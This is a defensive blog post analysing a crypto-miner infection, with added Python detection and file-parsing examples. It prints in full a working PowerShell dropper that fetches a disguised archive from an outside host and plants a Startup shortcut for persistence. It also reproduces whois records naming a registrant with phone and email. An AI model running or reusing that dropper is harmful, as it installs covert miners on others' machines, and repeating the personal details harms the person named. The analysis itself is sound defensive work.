Rise of the Crypto Miner Malware
We've been sitting on this for some time, but while tidying our notes we stumbled across this draft post we never really finished. Sadly, there is not too much to tell, but hopefully it will help other blue teamers understand crypto-mining malware infections.
A copy of the PowerShell malware can be found on Pastebin here:
https://pastebin.com/pxKXKKAY
The investigation started with a bit of PowerShell, wrapped in a WScript.Shell call:
new ActiveXObject("WScript.Shell").Run("powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "+String.fromCharCode(34)+"$str0 ="http://gul";$str1 = 'Miner' ;$TempDir = [System.IO.Path]::GetTempPath();$startup = [environment]::getfolderpath('Startup');$url1 = ($str0)+'fup.co/i/00676/e2zlk0e4qr4c.jpg';$output1 = ($TempDir+$str1);$wc = New-Object System.Net.WebClient;$wc.DownloadFile($url1, $output1);Start-Sleep -s 30;$proj_files = Get-Item -Path ($TempDir+$str1);ForEach ($file in $proj_files) {;$filenew1 = $str1 + '.zip';Rename-Item $file $filenew1};Expand-Archive -Path ($TempDir+$filenew1) -DestinationPath ($TempDir) -Force;Start-Sleep -s 20;$str3 = 'update.lnk';Copy-Item ($TempDir+$str3) -Destination $startup ;Start-Sleep -s 10;Invoke-Item ($startup+$str3)"+String.fromCharCode(34),0,false);
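As an added example (not part of the original post), here is a small Python triage over constructed process-creation events that scores the indicators visible in that dropper: execution-policy bypass, hidden window, a WebClient download, a URL split into fragments and glued back together, staging in the temp directory, archive expansion, a copy into the Startup folder and the sleep calls between stages. The event format, the regexes and the weights are this example's own assumptions, not a published rule.

```python
import re

# Indicators taken from the dropper command line quoted above. The regexes
# and weights are this example's own choices, not a published detection rule.
INDICATORS = [
    ("execpolicy_bypass",  re.compile(r"-ExecutionPolicy\s+Bypass", re.I), 2),
    ("hidden_window",      re.compile(r"-windowstyle\s+hidden", re.I), 2),
    ("webclient_download", re.compile(r"System\.Net\.WebClient|\.DownloadFile\(", re.I), 3),
    # a URL that stops after a few characters and is glued back together later
    ("split_url",          re.compile(r"=\s*['\"]https?://[^'\"/]{1,12}['\"]", re.I), 2),
    ("temp_staging",       re.compile(r"GetTempPath\(\)", re.I), 1),
    ("archive_expand",     re.compile(r"Expand-Archive", re.I), 1),
    ("startup_persist",    re.compile(r"getfolderpath\(\s*['\"]Startup['\"]\s*\)", re.I), 3),
    ("sleep_stagger",      re.compile(r"Start-Sleep\s+-s\s+\d+", re.I), 1),
]

# One indicator alone is common in admin scripting; the whole stack is not.
THRESHOLD = 6

def score_command_line(cmdline):
    """Return (score, [names of matched indicators]) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmdline)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits

# Minimal "user=<u> cmdline=<rest of line>" event format, constructed for this example.
_EVENT_RX = re.compile(r"user=(?P<user>\S+)\s+cmdline=(?P<cmd>.*)$")

def triage(events, threshold=THRESHOLD):
    """Parse process-creation events and return (user, score, hits) for each
    command line whose score reaches the threshold."""
    alerts = []
    for line in events:
        m = _EVENT_RX.search(line)
        if not m:
            continue
        score, hits = score_command_line(m.group("cmd"))
        if score >= threshold:
            alerts.append((m.group("user"), score, hits))
    return alerts

# Constructed sample events. The third one carries the post's dropper command line.
SAMPLE_EVENTS = [
    "user=alice cmdline=powershell -Command Get-Service -Name Spooler",
    "user=buildsvc cmdline=powershell -Command Expand-Archive -Path C:\\builds\\out.zip -DestinationPath C:\\builds\\out",
    "user=kamel cmdline=powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "
    "\"$str0 ='http://gul';$str1 = 'Miner';$TempDir = [System.IO.Path]::GetTempPath();"
    "$startup = [environment]::getfolderpath('Startup');"
    "$wc = New-Object System.Net.WebClient;$wc.DownloadFile($url1, $output1);Start-Sleep -s 30;"
    "Expand-Archive -Path ($TempDir+$filenew1) -DestinationPath ($TempDir) -Force;"
    "Copy-Item ($TempDir+$str3) -Destination $startup;Invoke-Item ($startup+$str3)\"",
]

if __name__ == "__main__":
    for user, score, hits in triage(SAMPLE_EVENTS):
        print(f"{user}: score {score} -> {', '.join(hits)}")
```

The build-agent line trips only the low-weight archive indicator and stays well under the threshold, while the dropper line matches every indicator. The JScript wrapper also gives a second signal the command line itself cannot: wscript.exe spawning powershell.exe, which is worth correlating with this score.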
minergate-cli -user djamel4art@gmail.com -bcn 1
The payload (the two URL fragments reassembled): http://gulfup.co/i/00676/e2zlk0e4qr4c.jpg
Hexdump of the payload:
$ xxd e2zlk0e4qr4c.jpg
0000000: 504b 0304 1400 0000 0800 665d 3945 22ec  PK........f]9E".
0000010: 0e6f 40ed 5000 00f0 7a00 1100 0000 6d69  .o@.P...z.....mi
0000020: 6e65 7267 6174 652d 636c 692e 6578 65d4  nergate-cli.exe.
0000030: 3a0b 7414 5596 af3a 954e 8514 e942 ba23  :.t.U..:.N...B.#
0000040: 08ab 7104 7526 0c2e 4405 a7fd 2439 d36d  ..q.u&..D...$9.m
0000050: 401b 3ab4 743b cb49 0203 3a31 e320 86ae  @.:.t;.I..:1. ..
Looks like a ZIP file containing a bitcoin miner: the file's magic bytes are 0x504b ("PK"), the ZIP signature, and the name of the first archived file, minergate-cli.exe, is readable straight out of the first local file header despite the .jpg extension.
We can use binwalk to extract parts of the binary:
$ binwalk e2zlk0e4qr4c.jpg
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract
5303663 0x50ED6F Zip archive data, at least v2.0 to extract
5461951 0x5357BF Zip archive data, at least v2.0 to extract
5935809 0x5A92C1 Zip archive data, at least v2.0 to extract
7763954 0x7677F2 COBALT boot rom data (Flat boot rom or file system)
8031674 0x7A8DBA Zip archive data, at least v2.0 to extract
...abbreviated...
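To make the magic-byte check concrete, here is an added example in Python (not from the original post): it sniffs the file type from the leading bytes, compares that with what the .jpg extension claims, and parses the first ZIP local file header out of the 96 bytes transcribed from the hexdump above, recovering the entry name, compression method, sizes and timestamp. The signature table and the extension-versus-content check are this example's own; the bytes are the page's.

```python
import os
import struct

# First 0x60 bytes of e2zlk0e4qr4c.jpg, transcribed from the hexdump above.
PAYLOAD_HEAD = bytes.fromhex(
    "504b0304140000000800665d394522ec"
    "0e6f40ed500000f07a00110000006d69"
    "6e6572676174652d636c692e657865d4"
    "3a0b74145596af3a954e8514e942ba23"
    "08ab710475260c2e4405a7fd2439d36d"
    "401b3ab4743bcb4902033a31e32086ae"
)

# A few well-known signatures; the extension a file carries is only a claim.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"MZ": "pe",
    b"\x7fELF": "elf",
}

def sniff(data):
    """Identify a file by its leading bytes rather than its name."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"

def extension_mismatch(filename, data):
    """Return (claimed extension, sniffed type, True if they disagree).
    Extensions this table does not know are never flagged."""
    ext = os.path.splitext(filename)[1].lower()
    kind = sniff(data)
    expected = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".zip": "zip", ".exe": "pe"}
    return ext, kind, expected.get(ext, kind) != kind

def dos_datetime(mdate, mtime):
    """Decode the MS-DOS date and time fields a ZIP header stores."""
    return (1980 + (mdate >> 9), (mdate >> 5) & 0xF, mdate & 0x1F,
            mtime >> 11, (mtime >> 5) & 0x3F, (mtime & 0x1F) * 2)

# ZIP local file header: signature, version, flags, method, time, date, crc32,
# compressed size, uncompressed size, name length, extra length (30 bytes).
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")

def parse_local_headers(data):
    """Walk the local file headers present in `data`, stopping at the first one
    that is absent or truncated. The next-header offset is computed from the
    compressed size, which is only valid when flag bit 3 (sizes deferred to a
    trailing data descriptor) is clear."""
    entries = []
    off = 0
    while off + LOCAL_HDR.size <= len(data):
        (sig, _ver, flags, method, mtime, mdate, crc,
         csize, usize, nlen, xlen) = LOCAL_HDR.unpack_from(data, off)
        if sig != b"PK\x03\x04":
            break
        name_start = off + LOCAL_HDR.size
        name = data[name_start:name_start + nlen]
        if len(name) < nlen:
            break
        data_start = name_start + nlen + xlen
        sizes_known = not flags & 0x8
        entries.append({
            "offset": off,
            "name": name.decode("cp437", "replace"),
            "method": method,            # 8 = deflate, 0 = stored
            "crc32": crc,
            "compressed_size": csize,
            "uncompressed_size": usize,
            "modified": dos_datetime(mdate, mtime),
            "data_offset": data_start,
            "next_header": data_start + csize if sizes_known else None,
        })
        if not sizes_known:
            break
        off = data_start + csize
    return entries

if __name__ == "__main__":
    print(extension_mismatch("e2zlk0e4qr4c.jpg", PAYLOAD_HEAD))
    for e in parse_local_headers(PAYLOAD_HEAD):
        print(f"{e['name']} method={e['method']} csize={e['compressed_size']} "
              f"next=0x{e['next_header']:X} modified={e['modified']}")
```

The next-header offset it computes from the first entry, 0x50ED6F, is exactly where binwalk reported its second "Zip archive data" hit, because binwalk matches the same PK\x03\x04 signature wherever it occurs. The "COBALT boot rom data" line is the flip side of that approach: a short signature landing inside compressed data, almost certainly a false positive.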
List of extracted files:
$ ls
0.zip 806577.zip 8A5FFA.zip e2zlk0e4qr4c.jpg rn.js
50ED6F.zip 8065D3.zip 8BD983.zip libeay32.dll ssleay32.dll
5357BF.zip 8265F6.zip Qt5Core.dll minergate-cli.exe update.lnk
5A92C1.zip 8268D8.zip Qt5Network.dll msvcp110.dll vccorlib110.dll
7A8DBA.zip 83D42C.zip Qt5WebSockets.dll msvcr110.dll
7FC82D.zip 83D454.zip cudart32_60.dll platforms
Running strings against the Windows shortcut (update.lnk):
$ strings update.lnk
/C:\
Users
kamel
AppData
Local
Temp
Ka=.
1SPS
rn.js
C:\Users\kamel\AppData\Local\Temp\rn.js
desktop-4tlqnc3
%temp%\rn.js
Minergate
The command:
minergate-cli -user djamel4art@gmail.com -bcn 1
minergate-cli command breakdown:
minergate-cli -user <account/email> -<coin type> <cores>
Therefore:
- account = djamel4art@gmail.com
- coin = Bytecoin
- cores = 1
A list of currency/coin types:
- bcn Bytecoin
- xmr Monero
- fcn Fantomcoin
- dsh Dashcoin
- qcn QuazarCoin
- xdn DigitalNote
- mcn MonetaVerde
- aeon Aeon coin
- inf8 Infinium-8
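As an added example (not from the original post), here is a Python parser for that command-line form, built on the coin table above. It generalises the single-coin case to several "-<coin> <cores>" pairs on one line; that generalisation is an assumption about the tool, not something the post shows.

```python
import os

# Coin flags as listed above (flag -> coin name).
COINS = {
    "bcn": "Bytecoin", "xmr": "Monero", "fcn": "Fantomcoin", "dsh": "Dashcoin",
    "qcn": "QuazarCoin", "xdn": "DigitalNote", "mcn": "MonetaVerde",
    "aeon": "Aeon coin", "inf8": "Infinium-8",
}

def parse_minergate_cmdline(cmdline):
    """Break a minergate-cli command line into account, coins and cores.

    Returns None if the executable is not minergate-cli, otherwise a dict:
      account  - value of -user (None if absent)
      coins    - {coin name: cores}; cores is None when the value is not a number
      unknown  - tokens that were not understood
    Assumption: several '-<coin> <cores>' pairs may appear on one line."""
    toks = cmdline.split()
    if not toks:
        return None
    exe = os.path.basename(toks[0].replace("\\", "/")).lower()
    if not exe.startswith("minergate-cli"):
        return None
    result = {"account": None, "coins": {}, "unknown": []}
    i = 1
    while i < len(toks):
        tok = toks[i]
        flag = tok.lstrip("-").lower() if tok.startswith("-") else None
        value = toks[i + 1] if i + 1 < len(toks) else None
        if flag == "user":
            result["account"] = value
            i += 2
        elif flag in COINS:
            try:
                cores = int(value)
            except (TypeError, ValueError):
                cores = None
            result["coins"][COINS[flag]] = cores
            i += 2
        else:
            result["unknown"].append(tok)
            i += 1
    return result

def total_cores(parsed):
    """CPU cores the miner was told to use, summed over all coins."""
    return sum(c for c in parsed["coins"].values() if c is not None)

if __name__ == "__main__":
    p = parse_minergate_cmdline("minergate-cli -user djamel4art@gmail.com -bcn 1")
    print(p, "total cores:", total_cores(p))
```

The account value is the one artefact here that ties infections together: the same -user string showing up on several hosts is a better pivot than the payload hash, which changes each time the archive is rebuilt.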
Whois on the domain:
$ whois gulfup.co
Domain Name: gulfup.co
Registry Domain ID: D177495327-CO
Registrar WHOIS Server:
Registrar URL: whois.godaddy.com
Updated Date: 2017-03-11T11:29:25Z
Creation Date: 2017-03-11T11:12:08Z
Registry Expiry Date: 2018-03-10T23:59:59Z
Registrar: GoDaddy.com, Inc.
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: C177495323-CO
Registrant Name: Abdulaali Alzahrani
Registrant Organization:
Registrant Street: albaha
Registrant Street: albaha
Registrant Street:
Registrant City: albaha
Registrant State/Province: king abdulaziz
Registrant Postal Code: 61008
Registrant Country: SA
Registrant Phone: +966.564401880
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: zx_xs@hotmail.com
Registry Admin ID: C177495325-CO
Tech Name: Abdulaali Alzahrani
Tech Organization:
Tech Street: albaha
Tech Street: albaha
Tech Street:
Tech City: albaha
Tech State/Province: king abdulaziz
Tech Postal Code: 61008
Tech Country: SA
Tech Phone: +966.564401880
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: zx_xs@hotmail.com
Name Server: aragorn.ns.cloudflare.com
Name Server: melissa.ns.cloudflare.com
Whois on the hosting IP range:
$ whois 62.210.139.211
inetnum: 62.210.128.0 - 62.210.255.255
org: ORG-ONLI1-RIPE
netname: IE-POOL-BUSINESS-HOSTING
descr: IP Pool for Iliad-Entreprises Business Hosting Customers
country: FR
admin-c: IENT-RIPE
tech-c: IENT-RIPE
status: LIR-PARTITIONED PA
mnt-by: MNT-TISCALIFR-B2B
created: 2012-11-02T11:40:24Z
last-modified: 2016-02-22T16:26:23Z
source: RIPE
mnt-routes: MNT-TISCALIFR-B2B
mnt-lower: MNT-TISCALIFR-B2B
For more information about Minergate visit: https://minergate.com/
Conclusion
The domain has a fake whois record, the dropped update.lnk file leaked a user name ('kamel'), and the minergate account was a Gmail address ('djamel4art'). At this point we could not progress any further.